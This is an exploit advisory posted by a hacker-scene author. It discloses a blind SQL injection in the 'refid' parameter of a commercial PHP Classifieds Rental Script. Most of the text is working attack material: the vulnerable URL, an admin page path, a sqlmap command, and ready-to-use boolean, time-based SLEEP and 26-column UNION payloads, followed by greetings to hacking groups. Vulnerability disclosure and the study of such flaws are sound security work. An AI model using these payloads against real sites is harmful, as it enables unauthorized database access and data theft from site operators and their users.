PHP Classifieds Rental Script Blind SQL Injection

2016.10.07
Credit: OoN_Boy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[x]============================================================================[x]
| Title        : PHP Classifieds Rental Script Blind SQL Vulnerabilities
| Software     : PHP Classifieds Rental Script
| Vendor       : http://www.i-netsolution.com/
| Demo         : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
| Date         : 06 October 2016
| Author       : OoN_Boy
[x]============================================================================[x]

[x]============================================================================[x]
| Technology   : PHP
| Database     : MySQL
| Price        : $ 99
| Description  : PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being an easy-to-use software, this Property Rental Script
[x]============================================================================[x]

[x]============================================================================[x]
| Exploit      : http://localhost/product_details.php?refid=%Inject_Here%1319258872
| Admin Page   : http://localhost/[path]/admin/index.php
[x]============================================================================[x]

[x]============================================================================[x]
| Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
[x]============================================================================[x]

---
Parameter: refid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ

    Type: UNION query
    Title: MySQL UNION query (NULL) - 26 columns
    Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
---

[x]============================================================================[x]
| Greetz       : antisecurity.org batamhacker.or.id
|                Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
|                k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
[x]============================================================================[x]

[x]============================================================================[x]
| Hi All long time no see ^_^
[x]============================================================================[x]

